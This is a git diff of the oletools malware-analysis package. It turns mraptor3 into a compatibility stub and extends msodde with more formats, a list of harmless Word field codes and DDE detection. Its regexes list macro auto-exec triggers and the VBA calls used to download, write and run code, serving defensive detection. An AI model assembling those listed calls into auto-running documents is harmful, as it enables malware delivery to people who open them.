+re_execute = re.compile(r'(?i)\b(?:Shell|CreateObject|GetObject|SendKeys|RUN|CALL|'
+ + r'MacScript|FollowHyperlink|CreateThread|ShellExecuteA?|ExecuteExcel4Macro|EXEC|REGISTER|SetTimer)\b|' + RE_DECLARE_LIB)
# === CLASSES =================================================================
diff --git a/oletools/mraptor3.py b/oletools/mraptor3.py
index b4215620..f3d72359 100644
--- a/oletools/mraptor3.py
+++ b/oletools/mraptor3.py
@@ -1,70 +1,10 @@
#!/usr/bin/env python
-"""
-mraptor.py - MacroRaptor
-MacroRaptor is a script to parse OLE and OpenXML files such as MS Office
-documents (e.g. Word, Excel), to detect malicious macros.
+# mraptor3 is a stub that redirects to mraptor.py, for backwards compatibility
-Supported formats:
-- Word 97-2003 (.doc, .dot), Word 2007+ (.docm, .dotm)
-- Excel 97-2003 (.xls), Excel 2007+ (.xlsm, .xlsb)
-- PowerPoint 97-2003 (.ppt), PowerPoint 2007+ (.pptm, .ppsm)
-- Word 2003 XML (.xml)
-- Word/Excel Single File Web Page / MHTML (.mht)
-- Publisher (.pub)
+import sys, os, warnings
-Author: Philippe Lagadec - http://www.decalage.info
-License: BSD, see source code or documentation
-
-MacroRaptor is part of the python-oletools package:
-http://www.decalage.info/python/oletools
-"""
-
-# === LICENSE ==================================================================
-
-# MacroRaptor is copyright (c) 2016-2017 Philippe Lagadec (http://www.decalage.info)
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
-#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
-# * Redistributions in binary form must reproduce the above copyright notice,
-# this list of conditions and the following disclaimer in the documentation
-# and/or other materials provided with the distribution.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-#------------------------------------------------------------------------------
-# CHANGELOG:
-# 2016-02-23 v0.01 PL: - first version
-# 2016-02-29 v0.02 PL: - added Workbook_Activate, FileSaveAs
-# 2016-03-04 v0.03 PL: - returns an exit code based on the overall result
-# 2016-03-08 v0.04 PL: - collapse long lines before analysis
-# 2016-07-19 v0.50 SL: - converted to Python 3
-# 2016-08-26 PL: - changed imports for Python 3
-# 2017-04-26 v0.51 PL: - fixed absolute imports (issue #141)
-# 2017-06-29 PL: - synced with mraptor.py 0.51
-
-__version__ = '0.51'
-
-#------------------------------------------------------------------------------
-# TODO:
-
-
-#--- IMPORTS ------------------------------------------------------------------
-
-import sys, os, logging, optparse, re
+warnings.warn('mraptor3 is deprecated, mraptor should be used instead.', DeprecationWarning)
# IMPORTANT: it should be possible to run oletools directly as scripts
# in any directory without installing them with pip or setup.py.
@@ -72,288 +12,12 @@
# And to enable Python 2+3 compatibility, we need to use absolute imports,
# so we add the oletools parent folder to sys.path (absolute+normalized path):
_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
-# print('_thismodule_dir = %r' % _thismodule_dir)
_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
-# print('_parent_dir = %r' % _thirdparty_dir)
-if not _parent_dir in sys.path:
+if _parent_dir not in sys.path:
sys.path.insert(0, _parent_dir)
-from oletools.thirdparty.xglob import xglob
-from oletools.thirdparty.tablestream import tablestream
-
-# import the python 3 version of olevba
-from oletools import olevba3 as olevba
-
-# === LOGGING =================================================================
-
-# a global logger object used for debugging:
-log = olevba.get_logger('mraptor')
-
-
-#--- CONSTANTS ----------------------------------------------------------------
-
-# URL and message to report issues:
-# TODO: make it a common variable for all oletools
-URL_ISSUES = 'https://github.com/decalage2/oletools/issues'
-MSG_ISSUES = 'Please report this issue on %s' % URL_ISSUES
-
-# 'AutoExec', 'AutoOpen', 'Auto_Open', 'AutoClose', 'Auto_Close', 'AutoNew', 'AutoExit',
-# 'Document_Open', 'DocumentOpen',
-# 'Document_Close', 'DocumentBeforeClose', 'Document_BeforeClose',
-# 'DocumentChange','Document_New',
-# 'NewDocument'
-# 'Workbook_Open', 'Workbook_Close',
-# *_Painted such as InkPicture1_Painted
-# *_GotFocus|LostFocus|MouseHover for other ActiveX objects
-# reference: http://www.greyhathacker.net/?p=948
-
-# TODO: check if line also contains Sub or Function
-re_autoexec = re.compile(r'(?i)\b(?:Auto(?:Exec|_?Open|_?Close|Exit|New)' +
- r'|Document(?:_?Open|_Close|_?BeforeClose|Change|_New)' +
- r'|NewDocument|Workbook(?:_Open|_Activate|_Close)' +
- r'|\w+_(?:Painted|Painting|GotFocus|LostFocus|MouseHover' +
- r'|Layout|Click|Change|Resize|BeforeNavigate2|BeforeScriptExecute' +
- r'|DocumentComplete|DownloadBegin|DownloadComplete|FileDownload' +
- r'|NavigateComplete2|NavigateError|ProgressChange|PropertyChange' +
- r'|SetSecureLockIcon|StatusTextChange|TitleChange|MouseMove' +
- r'|MouseEnter|MouseLeave|))\b')
-
-# MS-VBAL 5.4.5.1 Open Statement:
-RE_OPEN_WRITE = r'(?:\bOpen\b[^\n]+\b(?:Write|Append|Binary|Output|Random)\b)'
-
-re_write = re.compile(r'(?i)\b(?:FileCopy|CopyFile|Kill|CreateTextFile|'
- + r'VirtualAlloc|RtlMoveMemory|URLDownloadToFileA?|AltStartupPath|'
- + r'ADODB\.Stream|WriteText|SaveToFile|SaveAs|SaveAsRTF|FileSaveAs|MkDir|RmDir|SaveSetting|SetAttr)\b|' + RE_OPEN_WRITE)
-
-# MS-VBAL 5.2.3.5 External Procedure Declaration
-RE_DECLARE_LIB = r'(?:\bDeclare\b[^\n]+\bLib\b)'
-
-re_execute = re.compile(r'(?i)\b(?:Shell|CreateObject|GetObject|SendKeys|'
- + r'MacScript|FollowHyperlink|CreateThread|ShellExecute)\b|' + RE_DECLARE_LIB)
-
-# short tag to display file types in triage mode:
-TYPE2TAG = {
- olevba.TYPE_OLE: 'OLE',
- olevba.TYPE_OpenXML: 'OpX',
- olevba.TYPE_Word2003_XML: 'XML',
- olevba.TYPE_MHTML: 'MHT',
- olevba.TYPE_TEXT: 'TXT',
-}
-
-
-# === CLASSES =================================================================
-
-class Result_NoMacro(object):
- exit_code = 0
- color = 'green'
- name = 'No Macro'
-
-
-class Result_NotMSOffice(object):
- exit_code = 1
- color = 'green'
- name = 'Not MS Office'
-
-
-class Result_MacroOK(object):
- exit_code = 2
- color = 'cyan'
- name = 'Macro OK'
-
-
-class Result_Error(object):
- exit_code = 10
- color = 'yellow'
- name = 'ERROR'
-
-
-class Result_Suspicious(object):
- exit_code = 20
- color = 'red'
- name = 'SUSPICIOUS'
-
-
-class MacroRaptor(object):
- """
- class to scan VBA macro code to detect if it is malicious
- """
- def __init__(self, vba_code):
- """
- MacroRaptor constructor
- :param vba_code: string containing the VBA macro code
- """
- # collapse long lines first
- self.vba_code = olevba.vba_collapse_long_lines(vba_code)
- self.autoexec = False
- self.write = False
- self.execute = False
- self.flags = ''
- self.suspicious = False
- self.autoexec_match = None
- self.write_match = None
- self.execute_match = None
- self.matches = []
-
- def scan(self):
- """
- Scan the VBA macro code to detect if it is malicious
- :return:
- """
- m = re_autoexec.search(self.vba_code)
- if m is not None:
- self.autoexec = True
- self.autoexec_match = m.group()
- self.matches.append(m.group())
- m = re_write.search(self.vba_code)
- if m is not None:
- self.write = True
- self.write_match = m.group()
- self.matches.append(m.group())
- m = re_execute.search(self.vba_code)
- if m is not None:
- self.execute = True
- self.execute_match = m.group()
- self.matches.append(m.group())
- if self.autoexec and (self.execute or self.write):
- self.suspicious = True
-
- def get_flags(self):
- flags = ''
- flags += 'A' if self.autoexec else '-'
- flags += 'W' if self.write else '-'
- flags += 'X' if self.execute else '-'
- return flags
-
-
-# === MAIN ====================================================================
-
-def main():
- """
- Main function, called when olevba is run from the command line
- """
- global log
- DEFAULT_LOG_LEVEL = "warning" # Default log level
- LOG_LEVELS = {
- 'debug': logging.DEBUG,
- 'info': logging.INFO,
- 'warning': logging.WARNING,
- 'error': logging.ERROR,
- 'critical': logging.CRITICAL
- }
-
- usage = 'usage: %prog [options] [filename2 ...]'
- parser = optparse.OptionParser(usage=usage)
- parser.add_option("-r", action="store_true", dest="recursive",
- help='find files recursively in subdirectories.')
- parser.add_option("-z", "--zip", dest='zip_password', type='str', default=None,
- help='if the file is a zip archive, open all files from it, using the provided password (requires Python 2.6+)')
- parser.add_option("-f", "--zipfname", dest='zip_fname', type='str', default='*',
- help='if the file is a zip archive, file(s) to be opened within the zip. Wildcards * and ? are supported. (default:*)')
- parser.add_option('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
- help="logging level debug/info/warning/error/critical (default=%default)")
- parser.add_option("-m", '--matches', action="store_true", dest="show_matches",
- help='Show matched strings.')
-
- # TODO: add logfile option
-
- (options, args) = parser.parse_args()
-
- # Print help if no arguments are passed
- if len(args) == 0:
- print('MacroRaptor %s - http://decalage.info/python/oletools' % __version__)
- print('This is work in progress, please report issues at %s' % URL_ISSUES)
- print(__doc__)
- parser.print_help()
- print('\nAn exit code is returned based on the analysis result:')
- for result in (Result_NoMacro, Result_NotMSOffice, Result_MacroOK, Result_Error, Result_Suspicious):
- print(' - %d: %s' % (result.exit_code, result.name))
- sys.exit()
-
- # print banner with version
- print('MacroRaptor %s - http://decalage.info/python/oletools' % __version__)
- print('This is work in progress, please report issues at %s' % URL_ISSUES)
-
- logging.basicConfig(level=LOG_LEVELS[options.loglevel], format='%(levelname)-8s %(message)s')
- # enable logging in the modules:
- log.setLevel(logging.NOTSET)
-
- t = tablestream.TableStream(style=tablestream.TableStyleSlim,
- header_row=['Result', 'Flags', 'Type', 'File'],
- column_width=[10, 5, 4, 56])
-
- exitcode = -1
- global_result = None
- # TODO: handle errors in xglob, to continue processing the next files
- for container, filename, data in xglob.iter_files(args, recursive=options.recursive,
- zip_password=options.zip_password, zip_fname=options.zip_fname):
- # ignore directory names stored in zip files:
- if container and filename.endswith('/'):
- continue
- full_name = '%s in %s' % (filename, container) if container else filename
- # try:
- # # Open the file
- # if data is None:
- # data = open(filename, 'rb').read()
- # except:
- # log.exception('Error when opening file %r' % full_name)
- # continue
- if isinstance(data, Exception):
- result = Result_Error
- t.write_row([result.name, '', '', full_name],
- colors=[result.color, None, None, None])
- t.write_row(['', '', '', str(data)],
- colors=[None, None, None, result.color])
- else:
- filetype = '???'
- try:
- vba_parser = olevba.VBA_Parser(filename=filename, data=data, container=container)
- filetype = TYPE2TAG[vba_parser.type]
- except Exception as e:
- # log.error('Error when parsing VBA macros from file %r' % full_name)
- # TODO: distinguish actual errors from non-MSOffice files
- result = Result_Error
- t.write_row([result.name, '', filetype, full_name],
- colors=[result.color, None, None, None])
- t.write_row(['', '', '', str(e)],
- colors=[None, None, None, result.color])
- continue
- if vba_parser.detect_vba_macros():
- vba_code_all_modules = ''
- try:
- for (subfilename, stream_path, vba_filename, vba_code) in vba_parser.extract_all_macros():
- vba_code_all_modules += vba_code.decode('utf-8','replace') + '\n'
- except Exception as e:
- # log.error('Error when parsing VBA macros from file %r' % full_name)
- result = Result_Error
- t.write_row([result.name, '', TYPE2TAG[vba_parser.type], full_name],
- colors=[result.color, None, None, None])
- t.write_row(['', '', '', str(e)],
- colors=[None, None, None, result.color])
- continue
- mraptor = MacroRaptor(vba_code_all_modules)
- mraptor.scan()
- if mraptor.suspicious:
- result = Result_Suspicious
- else:
- result = Result_MacroOK
- t.write_row([result.name, mraptor.get_flags(), filetype, full_name],
- colors=[result.color, None, None, None])
- if mraptor.matches and options.show_matches:
- t.write_row(['', '', '', 'Matches: %r' % mraptor.matches])
- else:
- result = Result_NoMacro
- t.write_row([result.name, '', filetype, full_name],
- colors=[result.color, None, None, None])
- if result.exit_code > exitcode:
- global_result = result
- exitcode = result.exit_code
-
- print('')
- print('Flags: A=AutoExec, W=Write, X=Execute')
- print('Exit code: %d - %s' % (exitcode, global_result.name))
- sys.exit(exitcode)
+from oletools.mraptor import *
+from oletools.mraptor import __doc__, __version__
if __name__ == '__main__':
main()
-
-# Soundtrack: "Dark Child" by Marlon Williams
diff --git a/oletools/mraptor_milter.py b/oletools/mraptor_milter.py
index 2856a36f..eaf01f6e 100644
--- a/oletools/mraptor_milter.py
+++ b/oletools/mraptor_milter.py
@@ -98,18 +98,7 @@
from Milter.utils import parse_addr
-if sys.version_info[0] <= 2:
- # Python 2.x
- if sys.version_info[1] <= 6:
- # Python 2.6
- # use is_zipfile backported from Python 2.7:
- from oletools.thirdparty.zipfile27 import is_zipfile
- else:
- # Python 2.7
- from zipfile import is_zipfile
-else:
- # Python 3.x+
- from zipfile import is_zipfile
+from zipfile import is_zipfile
@@ -405,7 +394,7 @@ def main():
daemon.start()
# Using python-daemon - Does not work as-is, need to create the PID file
- # See https://pypi.python.org/pypi/python-daemon/
+ # See https://pypi.org/project/python-daemon/
# See PEP-3143: https://www.python.org/dev/peps/pep-3143/
# import daemon
# import lockfile
diff --git a/oletools/msodde.py b/oletools/msodde.py
index a425513e..303d9747 100644
--- a/oletools/msodde.py
+++ b/oletools/msodde.py
@@ -3,10 +3,14 @@
msodde.py
msodde is a script to parse MS Office documents
-(e.g. Word, Excel), to detect and extract DDE links.
+(e.g. Word, Excel, RTF), to detect and extract DDE links.
Supported formats:
- Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
+- Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
+- RTF
+- CSV (exported from / imported into Excel)
+- XML (exported from Word 2003, Word 2007+, Excel 2003, Excel 2007+?)
Author: Philippe Lagadec - http://www.decalage.info
License: BSD, see source code or documentation
@@ -15,68 +19,105 @@
http://www.decalage.info/python/oletools
"""
-# === LICENSE ==================================================================
+# === LICENSE =================================================================
-# msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
+# msodde is copyright (c) 2017-2019 Philippe Lagadec (http://www.decalage.info)
# All rights reserved.
#
-# Redistribution and use in source and binary forms, with or without modification,
-# are permitted provided that the following conditions are met:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
#
-# * Redistributions of source code must retain the above copyright notice, this
-# list of conditions and the following disclaimer.
+# * Redistributions of source code must retain the above copyright notice,
+# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+# -- IMPORTS ------------------------------------------------------------------
from __future__ import print_function
-#------------------------------------------------------------------------------
+import argparse
+import os
+import sys
+import re
+import csv
+
+import olefile
+
+# IMPORTANT: it should be possible to run oletools directly as scripts
+# in any directory without installing them with pip or setup.py.
+# In that case, relative imports are NOT usable.
+# And to enable Python 2+3 compatibility, we need to use absolute imports,
+# so we add the oletools parent folder to sys.path (absolute+normalized path):
+_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
+# print('_thismodule_dir = %r' % _thismodule_dir)
+_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
+# print('_parent_dir = %r' % _parent_dir)
+if _parent_dir not in sys.path:
+ sys.path.insert(0, _parent_dir)
+
+from oletools import ooxml
+from oletools import xls_parser
+from oletools import rtfobj
+from oletools.ppt_record_parser import is_ppt
+from oletools import crypto
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+from oletools.common.log_helper import log_helper
+
+# -----------------------------------------------------------------------------
# CHANGELOG:
# 2017-10-18 v0.52 PL: - first version
# 2017-10-20 PL: - fixed issue #202 (handling empty xml tags)
+# 2017-10-23 ES: - add check for fldSimple codes
+# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE
+# strings together
# 2017-10-25 CH: - add json output
# 2017-10-25 CH: - parse doc
-
-__version__ = '0.52dev3'
-
-#------------------------------------------------------------------------------
-# TODO: detect beginning/end of fields, to separate each field
-# TODO: test if DDE links can also appear in headers, footers and other places
-# TODO: add xlsx support
-
-#------------------------------------------------------------------------------
+# PL: - added logging
+# 2017-11-10 CH: - added field blacklist and corresponding cmd line args
+# 2017-11-23 CH: - added support for xlsx files
+# 2017-11-24 CH: - added support for xls files
+# 2017-11-29 CH: - added support for xlsb files
+# 2017-11-29 PL: - added support for RTF files (issue #223)
+# 2017-12-07 CH: - ensure rtf file is closed
+# 2018-01-05 CH: - add CSV
+# 2018-01-11 PL: - fixed issue #242 (apply unquote to fldSimple tags)
+# 2018-01-10 CH: - add single-xml files (Word 2003/2007+ / Excel 2003)
+# 2018-03-21 CH: - added detection for various CSV formulas (issue #259)
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-10-25 CH: - detect encryption and raise error if detected
+# 2019-03-25 CH: - added decryption of password-protected files
+# 2019-07-17 v0.55 CH: - fixed issue #267, unicode error on Python 2
+
+
+__version__ = '0.55'
+
+# -----------------------------------------------------------------------------
+# TODO: field codes can be in headers/footers/comments - parse these
+# TODO: generalize behaviour for xlsx: find all external links (maybe rename
+# command line flag for "blacklist" to "find all suspicious" or so)
+# TODO: Test with more interesting (real-world?) samples: xls, xlsx, xlsb, docx
+# TODO: Think about finding all external "connections" of documents, not just
+# DDE-Links
+# TODO: avoid reading complete rtf file data into memory
+
+# -----------------------------------------------------------------------------
# REFERENCES:
-#--- IMPORTS ------------------------------------------------------------------
-
-# import lxml or ElementTree for XML parsing:
-try:
- # lxml: best performance for XML processing
- import lxml.etree as ET
-except ImportError:
- import xml.etree.cElementTree as ET
-
-import argparse
-import zipfile
-import os
-import sys
-import json
-
-from oletools.thirdparty import olefile
-
# === PYTHON 2+3 SUPPORT ======================================================
if sys.version_info[0] >= 3:
@@ -86,11 +127,101 @@
NS_WORD = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
-
+NS_WORD_2003 = 'http://schemas.microsoft.com/office/word/2003/wordml'
+NO_QUOTES = False
# XML tag for 'w:instrText'
-TAG_W_INSTRTEXT = '{%s}instrText' % NS_WORD
-TAG_W_FLDSIMPLE = '{%s}fldSimple' % NS_WORD
-TAG_W_INSTRATTR= '{%s}instr' % NS_WORD
+TAG_W_INSTRTEXT = ['{%s}instrText' % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_FLDSIMPLE = ['{%s}fldSimple' % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_FLDCHAR = ['{%s}fldChar' % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_P = ["{%s}p" % ns for ns in (NS_WORD, NS_WORD_2003)]
+TAG_W_R = ["{%s}r" % ns for ns in (NS_WORD, NS_WORD_2003)]
+ATTR_W_INSTR = ['{%s}instr' % ns for ns in (NS_WORD, NS_WORD_2003)]
+ATTR_W_FLDCHARTYPE = ['{%s}fldCharType' % ns for ns in (NS_WORD, NS_WORD_2003)]
+LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
+ 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
+ 'word/footer2.xml', 'word/comments.xml')
+
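Word 2007+ (OpenXML) and Word 2003 XML use different namespaces for the same element names, which is why each tag constant above is now a list built over both namespaces. A sketch of how matching against such a list works with the standard library's ElementTree (the sample document string is a made-up illustration):

```python
import xml.etree.ElementTree as ET

NS_WORD = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
NS_WORD_2003 = 'http://schemas.microsoft.com/office/word/2003/wordml'
# one fully-qualified tag per supported namespace:
TAG_W_INSTRTEXT = ['{%s}instrText' % ns for ns in (NS_WORD, NS_WORD_2003)]

doc = ET.fromstring(
    '<w:p xmlns:w="%s"><w:r><w:instrText>DDEAUTO c:\\cmd.exe</w:instrText>'
    '</w:r></w:p>' % NS_WORD)

# iterate over all elements and keep those whose qualified tag matches either namespace:
fields = [elem.text for elem in doc.iter() if elem.tag in TAG_W_INSTRTEXT]
print(fields)  # ['DDEAUTO c:\\cmd.exe']
```

The same `elem.tag in TAG_…` test then transparently handles a Word 2003 single-file XML document, where the element would be `{http://schemas.microsoft.com/office/word/2003/wordml}instrText` instead.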
+# list of acceptable, harmless field instructions for blacklist field mode
+# c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
+# standard ISO-29500-1:2016 / ECMA-376 paragraphs 17.16.4, 17.16.5, 17.16.23
+# https://www.iso.org/standard/71691.html (neither mentions DDE[AUTO]).
+# Format: (command, n_required_args, n_optional_args,
+# switches_with_args, switches_without_args, format_switches)
+FIELD_BLACKLIST = (
+ # date and time:
+ ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
+ ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace
+ ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
+ ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
+ ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
+ # exclude document automation (we hate the "auto" in "automation")
+ # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
+ # document information
+ ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace
+ ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
+ ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace
+ ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
+ ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ # equations and formulas
+ # exclude '=' formulae because they have different syntax (and can be bad)
+ ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace
+ ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace
+ # form fields
+ ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ # index and tables
+ ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace
+ # exclude RD since that imports data from other files
+ ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace
+ ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace
+ ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace
+ ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace
+ ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace
+ # links and references
+ # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
+ ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace
+ ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace
+ # exclude HYPERLINK since we are allergic to URLs
+ # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
+ # exclude LINK and REF (could reference other files)
+ ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace
+ ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace
+ ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
+ ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace
+ # exclude all Mail Merge commands since they import data from other files
+ # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
+ # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
+ # Numbering
+ ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace
+ ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
+ ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
+ ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace
+ # user information # pylint: disable=bad-whitespace
+ ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+ ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
+)
+
+FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
+
+# filter modes
+FIELD_FILTER_DDE = 'only dde'
+FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
+FIELD_FILTER_ALL = 'keep all'
+FIELD_FILTER_DEFAULT = FIELD_FILTER_BLACKLIST
+
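The three filter modes map directly onto the `-d`, `-f` and `-a` command-line options added below. A simplified sketch of the dispatch, using the real `FIELD_DDE_REGEX` pattern but a tiny stand-in set instead of the full `FIELD_BLACKLIST` (the real blacklist mode also validates argument counts and switches, not just the command name):

```python
import re

FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
HARMLESS = {'DATE', 'PAGE', 'AUTHOR', 'FILENAME'}  # stand-in for FIELD_BLACKLIST

def keep_field(instruction, mode):
    """Decide whether a field instruction is reported, per filter mode."""
    if mode == 'only dde':                      # -d / --dde-only
        return FIELD_DDE_REGEX.match(instruction) is not None
    if mode == 'exclude blacklisted':           # -f / --filter (the default)
        parts = instruction.split()
        command = parts[0].upper() if parts else ''
        return command not in HARMLESS
    return True                                 # 'keep all' (-a / --all-fields)

print(keep_field('DDEAUTO c:\\cmd.exe /k calc', 'only dde'))   # True
print(keep_field('DATE \\@ "yyyy"', 'exclude blacklisted'))    # False
```

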